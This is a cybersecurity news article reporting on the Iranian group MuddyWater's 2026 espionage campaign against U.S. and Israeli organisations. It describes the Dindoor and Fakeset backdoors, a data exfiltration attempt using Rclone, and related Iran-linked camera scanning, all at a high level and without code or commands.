Iranian Cyber Group MuddyWater Infiltrates U.S. Networks with New Dindoor Backdoor
Recent investigations by Broadcom’s Symantec and the Carbon Black Threat Hunter Team have unveiled a sophisticated cyber espionage campaign orchestrated by the Iranian state-sponsored hacking group known as MuddyWater, also referred to as Seedworm. This group, affiliated with Iran’s Ministry of Intelligence and Security (MOIS), has successfully infiltrated multiple U.S. organizations, including banks, airports, non-profits, and the Israeli division of a software company.
Campaign Overview
The campaign is believed to have commenced in early February 2026, with a noticeable uptick in activity following recent military actions by the U.S. and Israel against Iran. MuddyWater’s primary objective appears to be the establishment of persistent access within these networks to facilitate intelligence gathering and potential disruption.
Targeted Entities
Among the affected organizations is a software company that supplies the defense and aerospace industries and maintains operations in Israel. The Israeli branch of this company seems to have been the focal point of MuddyWater’s activities. Additionally, a U.S. bank and a Canadian non-profit organization have been compromised, indicating the group’s broad targeting strategy.
Introduction of the Dindoor Backdoor
A significant aspect of this campaign is the deployment of a previously unidentified backdoor named Dindoor. This malware leverages the Deno JavaScript runtime environment to execute its payloads, showcasing MuddyWater’s adaptability and technical sophistication. The use of Deno suggests an effort to evade detection by utilizing less commonly monitored execution environments.
Data Exfiltration Attempts
Investigators have identified attempts to exfiltrate data from the compromised software company using Rclone, a command-line program for managing files on cloud storage. The data was intended to be transferred to a Wasabi cloud storage bucket. However, it remains unclear whether these exfiltration efforts were successful.
Deployment of the Fakeset Backdoor
In addition to Dindoor, MuddyWater has deployed another backdoor known as Fakeset within the networks of a U.S. airport and a non-profit organization. Fakeset is a Python-based malware downloaded from servers belonging to Backblaze, an American cloud storage and data backup company. Notably, the digital certificate used to sign Fakeset has also been associated with other malware strains like Stagecomp and Darkcomp, both previously linked to MuddyWater.
Implications and Analysis
The use of the same digital certificates across different malware variants suggests a coordinated effort by MuddyWater to maintain persistent access and control over compromised networks. This tactic also indicates an attempt to streamline their operations and reduce the likelihood of detection by security systems.
Security experts have observed that Iranian threat actors have significantly enhanced their capabilities in recent years. Their tooling and malware have become more sophisticated, and they have demonstrated strong social engineering skills, including spear-phishing campaigns and honeytrap operations. These methods are used to build relationships with targets to gain access to accounts or sensitive information.
Contextual Background
The findings emerge amidst escalating military conflicts involving Iran, which have triggered a surge in cyber activities. Research from Check Point has revealed that pro-Palestinian hacktivist groups, such as Handala Hack (also known as Void Manticore), have been routing their operations through Starlink IP ranges to probe externally facing applications for misconfigurations and weak credentials.
Furthermore, multiple Iran-affiliated adversaries, including Agrius (also known as Agonizing Serpens, Marshtreader, and Pink Sandstorm), have been observed scanning for vulnerable Hikvision cameras and video intercom solutions using known security flaws. The targeting has intensified in the wake of the current Middle East conflict, with exploitation attempts against IP cameras surging in Israel and Gulf countries, including the U.A.E., Qatar, Bahrain, and Kuwait, as well as Lebanon and Cyprus.
Conclusion
The recent activities of MuddyWater underscore the evolving threat landscape posed by state-sponsored cyber actors. Their ability to develop and deploy new malware variants like Dindoor and Fakeset, coupled with sophisticated social engineering tactics, highlights the need for organizations to enhance their cybersecurity measures. Continuous monitoring, employee training, and the implementation of robust security protocols are essential to defend against such advanced persistent threats.
